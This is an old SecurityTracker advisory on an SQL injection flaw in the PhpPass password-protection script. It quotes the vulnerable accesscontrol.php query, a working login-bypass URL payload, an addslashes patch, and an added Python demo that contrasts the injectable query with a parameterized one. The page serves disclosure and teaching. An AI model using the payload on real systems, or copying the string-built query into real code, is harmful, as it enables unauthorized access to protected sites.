SecurityTracker.com

SecurityTracker
Archives
Category:   Application (Security)  >   PhpPass
Vendors:   Qads
PhpPass Input Validation Flaw Lets Remote Users Inject SQL Commands to Gain Access to the System
SecurityTracker Alert ID:  1005948
SecurityTracker URL:  http://securitytracker.com/id/1005948
CVE Reference:   CVE-2003-1533
Updated:  Jun 14 2008
Original Entry Date:  Jan 20 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2
Description:   An input validation vulnerability was reported in the PhpPass web page password protection script. A remote user can gain access to protected web pages.

Frog-m@n reported that the 'accesscontrol.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted URL that will modify the SQL statement and cause the server to authenticate the remote user as the first user in the database.

A demonstration exploit URL is provided:

http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='

Impact:   A remote user can gain access to ostensibly protected web pages.
Solution:   No vendor solution was available at the time of this entry. The author of the report has developed an unofficial patch, listed in the Source Message and available at:

http://www.phpsecure.org/

Vendor URL:  qadsscripts.strykenet.com/home.php?what=Scripts&cat=11&id=1&mcat=PHP
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  phpPass (PHP)



Information:
Version: 2
Website: http://www.agames-net.com
Problem: SQL Injection

PHP Code/Location:
accesscontrol.php:
------------------------------------------------
[...]
session_register("uid");
session_register("pwd");
[...]
// $uid and $pwd come straight from the request and are interpolated
// into the query without any escaping or quoting of their own.
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
  session_unregister("uid");
  session_unregister("pwd");
  ?>
  <html>
  <head>
  <title> Access Denied </title>
[...]
  exit;
[...]
------------------------------------------------


Exploit:
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='


Patch:
In accesscontrol.php, replace the lines:
-------------------------------------------------
$sql = "SELECT * FROM user WHERE
        userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------

by:
------------------------------------------------------------------------
$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
------------------------------------------------------------------------

A patch can be found at http://www.phpsecure.org.


More details:
In French:
http://www.frog-man.org/tutos/phpPass.txt
Translated by Google:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n




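As an added example (not part of the SecurityTracker entry or of frog-m@n's message), the following Python script reproduces the tautology described above against an in-memory SQLite copy of phpPass's user table, and shows that a parameterized query, used here in place of the addslashes() patch from the message, leaves the same payload inert. The table contents, the account names and the function names are constructed for the demonstration; the query text and the payload are the ones quoted in the advisory.

```python
import sqlite3

# Constructed sample data standing in for phpPass's "user" table. The first
# row plays the role of "the first user in the database" that the advisory
# says the crafted URL authenticates as.
SAMPLE_USERS = [
    ("admin", "s3cret"),
    ("alice", "hunter2"),
]

# The advisory's payload, URL-decoded: uid='%20OR%20''='  ->  ' OR ''='
PAYLOAD = "' OR ''='"


def make_db():
    """Build the in-memory table the two lookups are run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, uid, pwd):
    """Mirror of the original accesscontrol.php: the request values are
    spliced into the SQL text, so a quote in them changes the statement.
    With PAYLOAD for both fields the statement becomes
        ... WHERE userid = '' OR ''='' AND password = '' OR ''=''
    and the trailing ''='' makes the WHERE clause true for every row."""
    sql = f"SELECT * FROM user WHERE userid = '{uid}' AND password = '{pwd}'"
    return conn.execute(sql).fetchall()


def parameterized_lookup(conn, uid, pwd):
    """Hardened form: placeholders hand the values to the driver as data.
    The quote and the OR in the payload are compared literally against the
    userid and password columns and match nothing."""
    sql = "SELECT * FROM user WHERE userid = ? AND password = ?"
    return conn.execute(sql, (uid, pwd)).fetchall()


def matched_user(rows):
    """phpPass treats mysql_num_rows() == 0 as 'Access Denied' and otherwise
    proceeds with the result set; this returns the userid of the first row,
    i.e. the identity the script would effectively accept, or None."""
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload  ->", matched_user(vulnerable_lookup(db, PAYLOAD, PAYLOAD)))
    print("parameterized, payload ->", matched_user(parameterized_lookup(db, PAYLOAD, PAYLOAD)))
    print("parameterized, valid   ->", matched_user(parameterized_lookup(db, "alice", "hunter2")))
```

Running the script shows the vulnerable lookup returning the whole table (so the caller is treated as the first account, here "admin") while the parameterized lookup returns nothing for the same input and still authenticates a genuine username/password pair. The same placeholder approach applies to the original PHP through mysqli or PDO prepared statements; unlike addslashes(), it does not depend on the connection's character set or on the escaping rules of a particular database.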

Copyright 2021, SecurityGlobal.net LLC